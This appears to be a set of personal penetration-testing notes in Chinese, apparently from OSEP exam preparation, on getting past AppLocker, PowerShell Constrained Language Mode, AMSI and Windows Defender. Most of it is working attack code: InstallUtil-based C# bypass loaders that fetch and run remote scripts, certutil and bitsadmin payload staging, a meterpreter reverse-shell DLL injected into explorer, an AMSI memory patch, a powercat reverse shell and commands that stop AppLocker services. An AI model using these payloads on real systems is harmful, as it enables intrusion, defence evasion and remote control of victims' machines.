#applocker-checker #### 检测是否配置了applocker ``` Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe ``` #### 白名单 ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319 C:\Windows\Tasks C:\Windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\spool\drivers\color ``` #### 常用方式-bypass clm csharp code ```cs using System; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Configuration.Install; namespace Bypass {     class Program     {         static void Main(string[] args)         {             Console.WriteLine("Nothing going on in this binary.");         }     }     [System.ComponentModel.RunInstaller(true)]     public class Sample : Installer     {         public override void Uninstall(System.Collections.IDictionary savedState)         {             String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.txt') | iex";             //String cmd = "(New-object Net.WebClient).DownloadFile('http://192.168.49.57/shell.exe','c:/users/public/a.exe');start-process 'c:/users/public/a.exe'";             //String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";             Runspace rs = RunspaceFactory.CreateRunspace();             rs.Open();             PowerShell ps = PowerShell.Create();             ps.Runspace = rs;             ps.AddScript(cmd);             ps.Invoke();             rs.Close();         }     } } ``` ``` atk certutil -encode Bypass.exe bypass.txt victim del C:\Windows\System32\spool\drivers\color\bypass.txt del C:\Windows\System32\spool\drivers\color\bypass.exe //bitsadmin /Transfer myJob http://192.168.49.57/bypass.txt C:\Windows\System32\spool\drivers\color\bypass.txt curl http://192.168.49.84/bypass.txt -o C:\Windows\System32\spool\drivers\color\bypass.txt certutil -decode C:\Windows\System32\spool\drivers\color\bypass.txt C:\Windows\System32\spool\drivers\color\bypass.exe && del C:\Windows\System32\spool\drivers\color\bypass.txt C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypass.exe ``` #### 搭配食用 ``` powershell "((New-Object Net.WebClient).DownloadString('http://192.168.49.57/hunter.txt') |IEX);Invoke-HostRecon" > c:/users/public/a.txt ``` ##### powershell受限模式绕过 食用同上 ``` using System; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Configuration.Install; namespace Bypass { class Program { static void Main(string[] args) { Console.WriteLine("This is the main method which is a decoy"); } } [System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary savedState) { String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt"; Runspace rs = RunspaceFactory.CreateRunspace(); rs.Open(); PowerShell ps = PowerShell.Create(); ps.Runspace = rs; ps.AddScript(cmd); ps.Invoke(); rs.Close(); } } } ``` ``` bitsadmin /Transfer myJob http://192.168.49.84/bypasspowershell.txt C:\Windows\System32\spool\drivers\color\bypasspowershell.txt curl http://192.168.49.84/bypasspowershell.txt -o C:\Windows\System32\spool\drivers\color\bypasspowershell.txt certutil -decode C:\Windows\System32\spool\drivers\color\bypasspowershell.txt C:\Windows\System32\spool\drivers\color\bypasspowershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypasspowershell.exe ``` ##### 反射dll返回 直接改代码,估计也是由于没带amsi失败了 ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.84 LPORT=443 EXITFUNC=thread -f dll -o met.dll String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"; String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name spoolv).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"; ``` ``` bitsadmin /Transfer myJob http://192.168.49.84/dllshell.txt C:\Windows\System32\spool\drivers\color\dllshell.txt curl http://192.168.49.84/dllshell.txt -o C:\Windows\System32\spool\drivers\color\dllshell2.txt certutil -decode C:\Windows\System32\spool\drivers\color\dllshell2.txt C:\Windows\System32\spool\drivers\color\dllshell2.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\dllshell2.exe ``` ##### 擦 自定义一个满shell的 ``` //这个sleep一定要 String cmd = "(New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/amsi.txt');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/run.ps1') | IEX;Start-Sleep -Seconds 100000"; curl http://192.168.49.84/custompsshell.txt -o C:\Windows\System32\spool\drivers\color\custompsshell1.txt certutil -decode C:\Windows\System32\spool\drivers\color\custompsshell1.txt C:\Windows\System32\spool\drivers\color\custompsshell1.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\custompsshell1.exe ``` #### 搞来搞去烦死了 关掉 ``` https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/delete-an-applocker-rule sc stop appid sc stop appidsvc sc stop applockerfltr sc.exe config applockerfltr start=demand sc.exe config appid start=demand sc.exe config appidsvc start=demand appidtel.exe stop [-mionly] ``` #### temp_bak #### CLM ``` $ExecutionContext.SessionState.LanguageMode $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" $ExecutionContext.SessionState.LanguageMode = "FullLanguage" https://sp00ks-git.github.io/posts/CLM-Bypass/ ``` #### LAPS + applocker 问题快速定位 以及hunter 在C#代码里 //hunter ``` (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/amsi.txt');(New-Object Net.WebClient).DownloadString('http://192.168.49.84/hunter.txt') |IEX;Invoke-HostRecon > c:/users/public/a.txt ``` //laps ``` (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/amsi.txt');(New-Object Net.WebClient).DownloadString('http://192.168.49.84/LAPSToolkit.ps1') |IEX;Get-LAPSComputers >> c:/users/public/laps.txt ; Find-LAPSDelegatedGroups >> c:/users/public/laps.txt ; Get-NetGroupMember -GroupName \"LAPS Password Readers\" >> c:/users/public/laps.txt ``` #### shell+amsi+applocker //有时因为payload原因 可能会失败 ``` String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt')|IEX"; amsi.txt $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) (New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.ps1')|IEX Start-Sleep -Seconds 100000 ``` ##### 备选方案 成功 这种过了WD,通过bypass amsi + powercat,可避免powercat 被WD识别 ``` String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt')|IEX";   amsi.txt $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) (New-Object Net.WebClient).DownloadString('http://192.168.49.84/powercat.ps1')|IEX ;powercat -c 192.168.49.84 -p 443 -e cmd ``` ##### 是在不行制作一个HW来对抗WD [[999999-osep-tips-public/osep-速查专用库/geek-osep/bypass av/bypass WD/Hollowing process]] ## 一键applocker ``` autorun applock. 1.将applocker 生成为autoapplocker.txt 的certutil 编码 放至目录 2.80开启web，将准备好的fm运行即可。 ```